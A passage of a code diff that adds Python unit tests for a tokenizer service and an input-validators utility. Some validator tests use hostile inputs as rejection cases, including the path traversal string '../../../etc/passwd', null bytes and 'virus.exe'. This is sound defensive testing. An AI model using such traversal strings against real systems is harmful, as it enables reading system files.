+ def test_load_predefined_tokenizer_success(self, mock_auto_tokenizer, mock_tokenizer):
68
+ """Test successful loading of predefined tokenizer."""
69
+ mock_auto_tokenizer.from_pretrained.return_value = mock_tokenizer
70
+
71
+ tokenizer, info, error = self.service.load_tokenizer('gpt2')
72
+
73
+ assert tokenizer is not None
74
+ assert error is None
75
+ assert isinstance(info, dict)
76
+ mock_auto_tokenizer.from_pretrained.assert_called_once()
77
+
78
+ @patch('app.services.tokenizer_service.AutoTokenizer')
79
+ def test_load_tokenizer_failure(self, mock_auto_tokenizer):
80
+ """Test tokenizer loading failure."""
81
+ mock_auto_tokenizer.from_pretrained.side_effect = Exception("Failed to load")
82
+
83
+ tokenizer, info, error = self.service.load_tokenizer('gpt2')
84
+
85
+ assert tokenizer is None
86
+ assert error is not None
87
+ assert "Failed to load" in error
88
+
89
+ def test_load_nonexistent_predefined_model(self):
90
+ """Test loading non-existent predefined model."""
91
+ tokenizer, info, error = self.service.load_tokenizer('nonexistent-model')
92
+
93
+ assert tokenizer is None
94
+ assert error is not None
95
+ assert "not found" in error.lower()
96
+
97
+ @patch('app.services.tokenizer_service.AutoTokenizer')
98
+ @patch('time.time')
99
+ def test_custom_tokenizer_caching(self, mock_time, mock_auto_tokenizer, mock_tokenizer, app):
100
+ """Test custom tokenizer caching behavior."""
101
+ with app.app_context():
102
+ mock_time.return_value = 1000.0
103
+ mock_auto_tokenizer.from_pretrained.return_value = mock_tokenizer
104
+
105
+ # First load
106
+ tokenizer1, info1, error1 = self.service.load_tokenizer('custom/model')
107
+
108
+ # Second load (should use cache)
109
+ mock_time.return_value = 1500.0 # Still within cache time
110
+ tokenizer2, info2, error2 = self.service.load_tokenizer('custom/model')
111
+
112
+ # Should only call from_pretrained once
113
+ assert mock_auto_tokenizer.from_pretrained.call_count == 1
114
+ assert tokenizer1 is tokenizer2
115
+
116
+ @patch('app.services.tokenizer_service.AutoTokenizer')
117
+ @patch('time.time')
118
+ def test_custom_tokenizer_cache_expiration(self, mock_time, mock_auto_tokenizer, mock_tokenizer, app):
119
+ """Test custom tokenizer cache expiration."""
120
+ with app.app_context():
121
+ mock_time.return_value = 1000.0
122
+ mock_auto_tokenizer.from_pretrained.return_value = mock_tokenizer
123
+
124
+ # First load
125
+ self.service.load_tokenizer('custom/model')
126
+
127
+ # Second load after cache expiration
128
+ mock_time.return_value = 5000.0 # Beyond cache expiration
129
+ self.service.load_tokenizer('custom/model')
130
+
131
+ # Should call from_pretrained twice
132
+ assert mock_auto_tokenizer.from_pretrained.call_count == 2
133
+
134
+ def test_tokenizer_models_constant(self):
135
+ """Test that TOKENIZER_MODELS contains expected models."""
136
+ models = self.service.TOKENIZER_MODELS
137
+
138
+ assert isinstance(models, dict)
139
+ assert len(models) > 0
140
+
141
+ # Check that each model has required fields
142
+ for model_id, model_info in models.items():
143
+ assert isinstance(model_id, str)
144
+ assert isinstance(model_info, dict)
145
+ assert 'name' in model_info
146
+ assert 'alias' in model_info
147
+ assert isinstance(model_info['name'], str)
148
+ assert isinstance(model_info['alias'], str)
149
+
150
+ def test_cache_initialization(self):
151
+ """Test that caches are properly initialized."""
152
+ service = TokenizerService()
153
+
154
+ assert hasattr(service, 'tokenizers')
155
+ assert hasattr(service, 'custom_tokenizers')
156
+ assert hasattr(service, 'tokenizer_info_cache')
157
+
158
+ assert isinstance(service.tokenizers, dict)
159
+ assert isinstance(service.custom_tokenizers, dict)
160
+ assert isinstance(service.tokenizer_info_cache, dict)
161
+
162
+ def test_special_tokens_filtering(self, mock_tokenizer):
163
+ """Test that only valid special tokens are included."""
164
+ # Add some None and empty special tokens
165
+ mock_tokenizer.pad_token = '<pad>'
166
+ mock_tokenizer.eos_token = '</s>'
167
+ mock_tokenizer.bos_token = None
168
+ mock_tokenizer.sep_token = ''
169
+ mock_tokenizer.cls_token = ' ' # Whitespace only
170
+ mock_tokenizer.unk_token = '<unk>'
171
+ mock_tokenizer.mask_token = '<mask>'
172
+
173
+ info = self.service.get_tokenizer_info(mock_tokenizer)
174
+ special_tokens = info['special_tokens']
175
+
176
+ # Should only include non-None, non-empty tokens
177
+ assert 'pad_token' in special_tokens
178
+ assert 'eos_token' in special_tokens
179
+ assert 'unk_token' in special_tokens
180
+ assert 'mask_token' in special_tokens
181
+
182
+ # Should not include None or empty tokens
183
+ assert 'bos_token' not in special_tokens
184
+ assert 'sep_token' not in special_tokens
185
+ assert 'cls_token' not in special_tokens
tests/test_validators.py ADDED
@@ -0,0 +1,256 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ Unit tests for Validators utility
3
+ """
4
+ import pytest
5
+ from app.utils.validators import Validators, ValidationError
6
+
7
+
8
+ class TestValidators:
9
+ """Test cases for Validators utility."""
10
+
11
+ def setup_method(self):
12
+ """Set up test fixtures."""
13
+ self.validators = Validators()
14
+
15
+ def test_validate_filename_valid(self):
16
+ """Test filename validation with valid filenames."""
17
+ # Valid filenames should not raise
18
+ self.validators.validate_filename('test.txt')
19
+ self.validators.validate_filename('document.md')
20
+ self.validators.validate_filename('script_file.py')
21
+ self.validators.validate_filename('My Document.txt')
22
+ self.validators.validate_filename('file-name.json')
23
+ self.validators.validate_filename('data123.csv')
24
+
25
+ def test_validate_filename_invalid(self):
26
+ """Test filename validation with invalid filenames."""
27
+ # Empty or None filename
28
+ with pytest.raises(ValidationError):
29
+ self.validators.validate_filename('')
30
+
31
+ with pytest.raises(ValidationError):
32
+ self.validators.validate_filename(None)
33
+
34
+ # Dangerous characters
35
+ with pytest.raises(ValidationError):
36
+ self.validators.validate_filename('../../../etc/passwd')
37
+
38
+ with pytest.raises(ValidationError):
39
+ self.validators.validate_filename('file\\with\\backslashes.txt')
40
+
41
+ # Null bytes
42
+ with pytest.raises(ValidationError):
43
+ self.validators.validate_filename('file\x00.txt')
44
+
45
+ # Control characters
46
+ with pytest.raises(ValidationError):
47
+ self.validators.validate_filename('file\x01\x02.txt')
48
+
49
+ # Reserved names on Windows
50
+ with pytest.raises(ValidationError):
51
+ self.validators.validate_filename('CON.txt')
52
+
53
+ with pytest.raises(ValidationError):
54
+ self.validators.validate_filename('PRN.txt')
55
+
56
+ with pytest.raises(ValidationError):
57
+ self.validators.validate_filename('AUX.txt')
58
+
59
+ def test_validate_file_extension_valid(self):
60
+ """Test file extension validation with valid extensions."""
61
+ allowed_extensions = {'.txt', '.md', '.py', '.js', '.json'}
62
+
63
+ # Valid extensions should not raise
64
+ self.validators.validate_file_extension('test.txt', allowed_extensions)
65
+ self.validators.validate_file_extension('document.md', allowed_extensions)
66
+ self.validators.validate_file_extension('script.py', allowed_extensions)
67
+ self.validators.validate_file_extension('data.json', allowed_extensions)
68
+
69
+ # Case insensitive
70
+ self.validators.validate_file_extension('FILE.TXT', allowed_extensions)
71
+ self.validators.validate_file_extension('Document.MD', allowed_extensions)
72
+
73
+ def test_validate_file_extension_invalid(self):
74
+ """Test file extension validation with invalid extensions."""
75
+ allowed_extensions = {'.txt', '.md', '.py'}
76
+
77
+ # Invalid extensions should raise
78
+ with pytest.raises(ValidationError):
79
+ self.validators.validate_file_extension('virus.exe', allowed_extensions)
80
+
81
+ with pytest.raises(ValidationError):
82
+ self.validators.validate_file_extension('archive.zip', allowed_extensions)
83
+
84
+ with pytest.raises(ValidationError):
85
+ self.validators.validate_file_extension('image.jpg', allowed_extensions)
86
+
87
+ # No extension
88
+ with pytest.raises(ValidationError):
89
+ self.validators.validate_file_extension('filename', allowed_extensions)
90
+
91
+ # Empty filename
92
+ with pytest.raises(ValidationError):
93
+ self.validators.validate_file_extension('', allowed_extensions)
94
+
95
+ def test_validate_model_path_valid(self):
96
+ """Test model path validation with valid paths."""
97
+ # Valid HuggingFace model paths
98
+ valid_paths = [
99
+ 'microsoft/DialoGPT-medium',
100
+ 'google/bert-base-uncased',
101
+ 'meta-llama/Llama-2-7b-hf',
102
+ 'mistralai/Mistral-7B-Instruct-v0.1',
103
+ 'Qwen/Qwen2.5-72B-Instruct',
104
+ 'THUDM/chatglm-6b',
105
+ 'deepseek-ai/deepseek-coder-6.7b-base',
106
+ 'unsloth/llama-2-7b-bnb-4bit',
107
+ 'google-bert/bert-base-uncased',
108
+ 'bartar/SPLM-2' # User's specific case
109
+ ]
110
+
111
+ for path in valid_paths:
112
+ self.validators.validate_model_path(path) # Should not raise
113
+
114
+ def test_validate_model_path_invalid_format(self):
115
+ """Test model path validation with invalid formats."""
116
+ # Invalid formats should raise
117
+ invalid_paths = [
118
+ '', # Empty
119
+ 'invalid-path', # No slash
120
+ 'user/', # Empty model name
121
+ '/model-name', # Empty user
122
+ 'user//model', # Double slash
123
+ 'user/model/extra', # Too many parts
124
+ 'user name/model', # Space in user
125
+ 'user/model name', # Space in model (actually this might be valid)
126
+ 'user@domain/model', # Invalid characters
127
+ '../malicious/path', # Path traversal
128
+ 'user\\model', # Backslash
129
+ ]
130
+
131
+ for path in invalid_paths:
132
+ with pytest.raises(ValidationError):
133
+ self.validators.validate_model_path(path)
134
+
135
+ def test_validate_model_path_untrusted_prefix(self):
136
+ """Test model path validation with untrusted prefixes."""
137
+ # Paths with untrusted prefixes should raise
138
+ untrusted_paths = [
139
+ 'random-user/some-model',
140
+ 'untrusted/malicious-model',
141
+ 'hacker/backdoor-model',
142
+ 'suspicious/model'
143
+ ]
144
+
145
+ for path in untrusted_paths:
146
+ with pytest.raises(ValidationError):
147
+ self.validators.validate_model_path(path)
148
+
149
+ def test_validate_model_path_edge_cases(self):
150
+ """Test model path validation edge cases."""
151
+ # None input
152
+ with pytest.raises(ValidationError):
153
+ self.validators.validate_model_path(None)
154
+
155
+ # Very long path
156
+ long_path = 'microsoft/' + 'a' * 1000
157
+ with pytest.raises(ValidationError):
158
+ self.validators.validate_model_path(long_path)
159
+
160
+ # Special characters in allowed prefix
161
+ self.validators.validate_model_path('microsoft/model-with-dashes')
162
+ self.validators.validate_model_path('microsoft/model_with_underscores')
163
+ self.validators.validate_model_path('microsoft/model.with.dots')
164
+
165
+ def test_validate_text_input_valid(self):
166
+ """Test text input validation with valid inputs."""
167
+ # Valid text inputs should not raise
168
+ self.validators.validate_text_input('Hello world!')
169
+ self.validators.validate_text_input('A' * 1000) # Long but reasonable text
170
+ self.validators.validate_text_input('Text with\nnewlines\nand\ttabs')
171
+ self.validators.validate_text_input('Unicode: 你好世界 🌍')
172
+ self.validators.validate_text_input('') # Empty text might be valid
173
+
174
+ def test_validate_text_input_invalid(self):
175
+ """Test text input validation with invalid inputs."""
176
+ # None input
177
+ with pytest.raises(ValidationError):
178
+ self.validators.validate_text_input(None)
179
+
180
+ # Extremely long text (if there's a limit)
181
+ very_long_text = 'A' * (10 * 1024 * 1024) # 10MB of text
182
+ with pytest.raises(ValidationError):
183
+ self.validators.validate_text_input(very_long_text)
184
+
185
+ def test_validate_text_input_malicious_content(self):
186
+ """Test text input validation with potentially malicious content."""
187
+ # Null bytes
188
+ with pytest.raises(ValidationError):
189
+ self.validators.validate_text_input('text\x00with\x00nulls')
190
+
191
+ # Control characters (some might be allowed like \n, \t)
192
+ try:
193
+ self.validators.validate_text_input('text\x01with\x02controls')
194
+ except ValidationError:
195
+ pass # This might be expected
196
+
197
+ def test_validation_error_messages(self):
198
+ """Test that ValidationError contains meaningful messages."""
199
+ # Test filename validation error message
200
+ try:
201
+ self.validators.validate_filename('../../../etc/passwd')
202
+ assert False, "Should have raised ValidationError"
203
+ except ValidationError as e:
204
+ assert 'filename' in str(e).lower() or 'path' in str(e).lower()
205
+
206
+ # Test file extension error message
207
+ try:
208
+ self.validators.validate_file_extension('virus.exe', {'.txt'})
209
+ assert False, "Should have raised ValidationError"
210
+ except ValidationError as e:
211
+ assert 'extension' in str(e).lower() or 'allowed' in str(e).lower()
212
+
213
+ # Test model path error message
214
+ try:
215
+ self.validators.validate_model_path('invalid-path')
216
+ assert False, "Should have raised ValidationError"
217
+ except ValidationError as e:
218
+ assert 'model' in str(e).lower() or 'path' in str(e).lower()
219
+
220
+ def test_allowed_model_prefixes_coverage(self):
221
+ """Test that all common model prefixes are covered."""
222
+ # This test ensures we have good coverage of trusted model prefixes
223
+ common_prefixes = [
224
+ 'microsoft/',
225
+ 'google/',
226
+ 'meta-llama/',
227
+ 'mistralai/',
228
+ 'openai-community/',
229
+ 'Qwen/',
230
+ 'THUDM/',
231
+ 'deepseek-ai/',
232
+ 'unsloth/',
233
+ 'google-bert/'
234
+ ]
235
+
236
+ for prefix in common_prefixes:
237
+ # Should be able to validate models with these prefixes
238
+ test_path = prefix + 'test-model'
239
+ try:
240
+ self.validators.validate_model_path(test_path)
241
+ except ValidationError:
242
+ pytest.fail(f"Trusted prefix {prefix} should be allowed")
243
+
244
+ def test_case_sensitivity(self):
245
+ """Test case sensitivity in various validations."""
246
+ # File extensions should be case insensitive
247
+ allowed_extensions = {'.txt', '.md'}
248
+ self.validators.validate_file_extension('FILE.TXT', allowed_extensions)
249
+ self.validators.validate_file_extension('Document.MD', allowed_extensions)
250
+
251
+ # Model path prefixes should be case sensitive (HuggingFace convention)
252
+ self.validators.validate_model_path('Microsoft/model') # Capital M
253
+
254
+ # But random capitalization in untrusted prefixes should still fail
255
+ with pytest.raises(ValidationError):
256
+ self.validators.validate_model_path('RANDOM/model')